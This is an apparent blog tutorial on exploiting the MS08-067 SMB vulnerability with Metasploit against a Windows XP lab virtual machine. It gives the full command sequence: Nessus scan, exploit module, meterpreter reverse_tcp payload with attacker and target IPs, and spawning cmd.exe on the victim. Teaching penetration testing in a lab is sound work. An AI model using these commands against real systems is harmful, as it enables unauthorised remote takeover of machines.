Tuesday, 11 September 2012

How to exploit Port 445 SMB using Metasploit

In this post I will exploit port 445 (SMB) using Metasploit on BackTrack R2.
First we need information about the victim; in penetration testing this step is known as information gathering. We can use nmap, Zenmap or similar tools to scan the network for candidate victims.


Then we run a vulnerability assessment against the target IP 192.168.56.101; I use Nessus for this.

In the scan above we can see that the victim has 2 high-risk vulnerabilities. Click on port 445 to see the details, which look like this:


Of the 2 vulnerabilities in the scan above I chose the 2nd plugin, MS08-067. I looked up that vulnerability on Google, found the description of the matching Metasploit module, and decided to exploit it. Next, open the Metasploit console from a terminal with the command # msfconsole


Use the exploit that matches the Nessus result; the syntax in Metasploit is
use exploit/windows/smb/ms08_067_netapi


After choosing the exploit we need to set a payload with the syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After setting the payload we need to set the local host (the attacker machine the reverse shell connects back to) and the target, with the syntax
set LHOST 192.168.56.102 -------------------------------------> my IP (attacker machine)
set RHOST 192.168.56.101 -------------------------------------> target IP
and launch the exploit with the syntax
exploit
If it succeeds we land in a meterpreter session.


Once we are in meterpreter, the payload has given us a foothold on the target system. To take the target over fully we now want a command prompt on it, which starts in C:\WINDOWS\system32. Use the syntax
 
meterpreter > execute -f cmd.exe -i
This tells the target (XP) to run cmd.exe (-f names the executable) and hands us an interactive session with it (-i); after that we are inside system32 on the target.


From the above we can see that the Windows XP SP3 guest in VirtualBox has been hacked: a command prompt appears among its running Windows applications.
Furthermore, to prove that I have really got into the Windows system, I will create a new folder named "PANJI_IS2C".


Congratulations, we have successfully exploited Windows using Metasploit.
